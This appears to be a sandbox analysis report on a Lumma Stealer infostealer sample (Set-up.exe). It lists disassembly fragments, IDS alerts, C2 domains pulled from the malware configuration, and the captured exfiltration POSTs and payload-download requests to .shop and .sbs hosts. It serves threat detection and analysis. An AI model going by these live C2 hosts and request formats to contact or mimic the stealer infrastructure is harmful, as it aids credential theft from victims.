              Source: unknownHTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49757 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.208.58:443 -> 192.168.2.4:49758 version: TLS 1.2
              Source: Binary string: wntdll.pdbUGP source: BrightLib.exe, 00000024.00000002.2524141455.00000000382E6000.00000004.00000020.00020000.00000000.sdmp, BrightLib.exe, 00000024.00000002.2524283597.0000000038640000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: BrightLib.exe, 00000024.00000002.2524141455.00000000382E6000.00000004.00000020.00020000.00000000.sdmp, BrightLib.exe, 00000024.00000002.2524283597.0000000038640000.00000004.00000800.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_0224D2E8
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx ecx, byte ptr [edi+eax+17064887h]0_2_0221F348
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]0_2_022323F8
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h0_2_022533C8
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov ebp, dword ptr [ecx+esi*4-000009BCh]0_2_0221A3D8
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then push ebx0_2_0221C02B
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov eax, ebx0_2_02230078
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov ecx, eax0_2_0221B098
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+14B53331h]0_2_02253098
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_0223F1D8
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+2AAF123Ah]0_2_0223B628
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], AF52E86Bh0_2_0223B628
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then lea edi, dword ptr [edx+ecx]0_2_0223B628
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then add edx, ecx0_2_0223B628
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-1FEE02EFh]0_2_02241636
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov edx, eax0_2_02232608
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+0000019Ch]0_2_0221B658
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-1FEE02EFh]0_2_022415B1
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then push esi0_2_022286EB
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov edi, edx0_2_022326F8
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov ecx, eax0_2_0222871D
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], C18AD805h0_2_0221E748
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx ebx, byte ptr [esp+edx-74166255h]0_2_0222F78D
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h0_2_022407D8
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov esi, eax0_2_02253438
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 77282253h0_2_02253438
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_02241412
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp word ptr [edi+eax], 0000h0_2_02234458
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov ebx, ecx0_2_02234458
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], 4B884A2Eh0_2_022574B8
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov word ptr [eax], cx0_2_0222D4C8
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov dword ptr [esp+44h], 00000000h0_2_0221E4DE
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp word ptr [esi+eax], 0000h0_2_0222F518
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-1FEE02EFh]0_2_022415F1
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-66h]0_2_0222A5CC
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov ebp, dword ptr [esp+18h]0_2_022279FA
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov byte ptr [edi], al0_2_0222DAF7
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-2Ch]0_2_0222DAF7
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h0_2_0221FACF
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx edx, word ptr [eax]0_2_02256B78
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h0_2_02227841
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx edx, byte ptr [esi]0_2_02238918
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then not eax0_2_02228983
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx eax, byte ptr [esp+ecx+0000014Ch]0_2_0224398A
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov ecx, eax0_2_0222E9C1
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+0B07DD58h]0_2_0223DE00
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov byte ptr [edx], bl0_2_0221FEE2
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov byte ptr [edx], bl0_2_0221FEE2
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]0_2_02218F18
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx ecx, word ptr [ebp+edi*4+00h]0_2_02218F18
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx esi, word ptr [ecx]0_2_02226F78
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], 6A911B6Ch0_2_02228C04
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov word ptr [ecx], dx0_2_0222FC18
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov word ptr [ebp+00h], ax0_2_0222FC18
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov byte ptr [edx], bl0_2_0221ACA8
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp word ptr [edx+esi], 0000h0_2_02233CF8
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then test esi, esi0_2_02250D78
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp al, 2Eh0_2_0223BDB7

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49748 -> 104.21.87.8:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49749 -> 104.21.87.8:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49749 -> 104.21.87.8:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49748 -> 104.21.87.8:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49755 -> 104.21.87.8:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49756 -> 104.21.87.8:443
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: cloudewahsj.shop
              Source: Malware configuration extractorURLs: abruptyopsn.shop
              Source: Malware configuration extractorURLs: nearycrepso.shop
              Source: Malware configuration extractorURLs: framekgirus.shop
              Source: Malware configuration extractorURLs: noisycuttej.shop
              Source: Malware configuration extractorURLs: cellardesiresso.sbs
              Source: Malware configuration extractorURLs: wholersorie.shop
              Source: Malware configuration extractorURLs: rabidcowse.shop
              Source: Malware configuration extractorURLs: tirepublicerj.shop
              Source: Joe Sandbox ViewIP Address: 185.161.251.21 185.161.251.21
              Source: Joe Sandbox ViewIP Address: 172.67.208.58 172.67.208.58
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49751 -> 104.21.87.8:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49748 -> 104.21.87.8:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49752 -> 104.21.87.8:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49755 -> 104.21.87.8:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49749 -> 104.21.87.8:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49756 -> 104.21.87.8:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49750 -> 104.21.87.8:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49758 -> 172.67.208.58:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49753 -> 104.21.87.8:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49757 -> 185.161.251.21:443
              Source: Network trafficSuricata IDS: 2008438 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send a Text File : 172.67.208.58:443 -> 192.168.2.4:49758
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cellardesiresso.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 79Host: cellardesiresso.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=9JRIGM89O7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18115Host: cellardesiresso.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4LOL4O0HVV003F1EUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8778Host: cellardesiresso.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=1CTPDNSQLA59CQLBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20425Host: cellardesiresso.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=1I1ML2QD2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 944Host: cellardesiresso.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=61SO7GFGNSUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1054Host: cellardesiresso.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 114Host: cellardesiresso.sbs
              Source: global trafficHTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
              Source: global trafficHTTP traffic detected: GET /int_clp_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: klipvumisui.shop
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
              Source: global trafficHTTP traffic detected: GET /int_clp_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: klipvumisui.shop
              Source: global trafficDNS traffic detected: DNS query: cellardesiresso.sbs
              Source: global trafficDNS traffic detected: DNS query: cegu.shop
              Source: global trafficDNS traffic detected: DNS query: klipvumisui.shop
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cellardesiresso.sbs
              Source: Set-up.exe, 00000000.00000003.1832991094.00000000034F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: Set-up.exe, 00000000.00000003.1832991094.00000000034F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: Set-up.exeString found in binary or memory: http://certificates.starfieldtech.com/repository/1604
              Source: Set-up.exe, 00000000.00000003.1967591399.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1975541665.000000000060F000.00000004.00000020.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.exe.0.drString found in binary or memory: http://certs.securetrust.com/issuers/TWGCA.crt0
              Source: Set-up.exe, 00000000.00000003.1967591399.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1975541665.000000000060F000.00000004.00000020.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.exe.0.drString found in binary or memory: http://certs.securetrust.com/issuers/TWGCSCA_L1.crt0
              Source: Set-up.exe, 00000000.00000003.1967591399.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1975541665.000000000060F000.00000004.00000020.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.exe.0.drString found in binary or memory: http://certs.securetrust.com/issuers/VCTWGTSCA_L1.crt0
              Source: PU6S498VOPMOZVY2Y7.tmp, 00000009.00000003.2528654757.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drString found in binary or memory: http://crl.certum.pl/cscasha2.crl0q
              Source: PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.1996237437.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.2003746218.0000000002800000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000009.00000003.2528654757.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drString found in binary or memory: http://crl.certum.pl/ctnca.crl0k
              Source: Set-up.exe, 00000000.00000003.1832991094.00000000034F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.1996237437.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.2003746218.0000000002800000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000009.00000003.2528654757.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
              Source: Set-up.exe, 00000000.00000003.1967591399.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1975541665.000000000060F000.00000004.00000020.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.exe.0.drString found in binary or memory: http://crl.securetrust.com/TWGCSCA_L1.crl0y
              Source: Set-up.exeString found in binary or memory: http://crl.starfieldtech.com/repository/0
              Source: Set-up.exeString found in binary or memory: http://crl.starfieldtech.com/repository/sfsroot.crl0P
              Source: Set-up.exeString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
              Source: Set-up.exe, 00000000.00000003.1967591399.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1975541665.000000000060F000.00000004.00000020.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.exe.0.drString found in binary or memory: http://crl.trustwave.com/TWGCA.crl0n
              Source: PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.2003746218.0000000002800000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000009.00000003.2528654757.0000000002E70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.usertr
              Source: Set-up.exe, 00000000.00000003.1967591399.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1975541665.000000000060F000.00000004.00000020.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.exe.0.drString found in binary or memory: http://crl.vikingcloud.com/TWGCA.crl0t
              Source: Set-up.exe, 00000000.00000003.1967591399.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1975541665.000000000060F000.00000004.00000020.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.exe.0.drString found in binary or memory: http://crl.vikingcloud.com/VCTWGTSCA_L1.crl0
              Source: Set-up.exe, 00000000.00000003.1832991094.00000000034F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: Set-up.exe, 00000000.00000003.1832991094.00000000034F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: Set-up.exe, 00000000.00000003.1832991094.00000000034F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: Set-up.exe, 00000000.00000003.1832991094.00000000034F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.2003746218.0000000002800000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000009.00000003.2528654757.0000000002E70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/Sectig
              Source: PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.1996237437.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.2003746218.0000000002800000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000009.00000003.2528654757.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
              Source: PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.1996237437.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.2003746218.0000000002800000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000009.00000003.2528654757.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drString found in binary or memory: http://cscasha2.ocsp-certum.com04
              Source: BrightLib.exe, 00000024.00000002.2500367955.0000000003220000.00000004.00000020.00020000.00000000.sdmp, BrightLib.exe, 00000024.00000000.2455660146.0000000000AEE000.00000002.00000001.01000000.0000000E.sdmp, BrightLib.exe, 00000024.00000002.2500943004.00000000062A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://michaeluno.jp/
              Source: BrightLib.exe, 00000024.00000002.2500367955.0000000003220000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://michaeluno.jp/4
              Source: BrightLib.exe, 00000024.00000002.2500321034.0000000003218000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://michaeluno.jp/h
              Source: Set-up.exe, 00000000.00000003.1832991094.00000000034F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: Set-up.exe, 00000000.00000003.1832991094.00000000034F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.1996237437.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.2003746218.0000000002800000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000009.00000003.2528654757.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drString found in binary or memory: http://ocsp.sectigo.com0
              Source: Set-up.exe, 00000000.00000003.1967591399.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1975541665.000000000060F000.00000004.00000020.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.exe.0.drString found in binary or memory: http://ocsp.securetrust.com/0?
              Source: Set-up.exeString found in binary or memory: http://ocsp.starfieldtech.com/0D
              Source: Set-up.exeString found in binary or memory: http://ocsp.thawte.com0
              Source: Set-up.exe, 00000000.00000003.1967591399.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1975541665.000000000060F000.00000004.00000020.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.exe.0.drString found in binary or memory: http://ocsp.trustwave.com/06
              Source: Set-up.exe, 00000000.00000003.1967591399.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1975541665.000000000060F000.00000004.00000020.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.exe.0.drString found in binary or memory: http://ocsp.vikingcloud.com/0:
              Source: Set-up.exe, 00000000.00000003.1967591399.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1975541665.000000000060F000.00000004.00000020.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.exe.0.drString found in binary or memory: http://ocsp.vikingcloud.com/0A
              Source: PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.1996237437.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.2003746218.0000000002800000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000009.00000003.2528654757.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drString found in binary or memory: http://repository.certum.pl/cscasha2.cer0
              Source: PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.1996237437.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.2003746218.0000000002800000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000009.00000003.2528654757.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drString found in binary or memory: http://repository.certum.pl/ctnca.cer09
              Source: Set-up.exeString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
              Source: Set-up.exeString found in binary or memory: http://s2.symcb.com0
              Source: powershell.exe, 00000002.00000002.1903649032.00000000048BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: Set-up.exeString found in binary or memory: http://sf.symcb.com/sf.crl0f
              Source: Set-up.exeString found in binary or memory: http://sf.symcb.com/sf.crt0
              Source: Set-up.exeString found in binary or memory: http://sf.symcd.com0&
              Source: Set-up.exe, 00000000.00000003.1967591399.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1975541665.000000000060F000.00000004.00000020.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.exe.0.drString found in binary or memory: http://ssl.trustwave.com/issuers/TWGCA.crt0
              Source: PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.1996237437.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.2003746218.0000000002800000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000009.00000003.2528654757.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drString found in binary or memory: http://subca.ocsp-certum.com01
              Source: Set-up.exeString found in binary or memory: http://sv.symcb.com/sv.crl0W
              Source: Set-up.exeString found in binary or memory: http://sv.symcb.com/sv.crt0
              Source: Set-up.exeString found in binary or memory: http://sv.symcd.com0&
              Source: Set-up.exeString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
              Source: Set-up.exeString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
              Source: Set-up.exeString found in binary or memory: http://ts-ocsp.ws.symantec.com07
              Source: BrightLib.exe, 00000024.00000000.2455612462.000000000049A000.00000002.00000001.01000000.0000000E.sdmp, BrightLib.exe, 00000024.00000002.2499423474.000000000049A000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: http://www.autohotkey.com
              Source: BrightLib.exe, 00000024.00000000.2455612462.000000000049A000.00000002.00000001.01000000.0000000E.sdmp, BrightLib.exe, 00000024.00000002.2499423474.000000000049A000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: http://www.autohotkey.comCould
              Source: PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.1996237437.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.2003746218.0000000002800000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000009.00000003.2528654757.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drString found in binary or memory: http://www.certum.pl/CPS0
              Source: BrightLib.exe, 00000024.00000002.2524483851.0000000039BA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.info-zip.org/
              Source: Set-up.exeString found in binary or memory: http://www.innosetup.com/
              Source: Set-up.exeString found in binary or memory: http://www.remobjects.com/ps
              Source: Set-up.exeString found in binary or memory: http://www.symauth.com/cps0(
              Source: Set-up.exeString found in binary or memory: http://www.symauth.com/rpa00
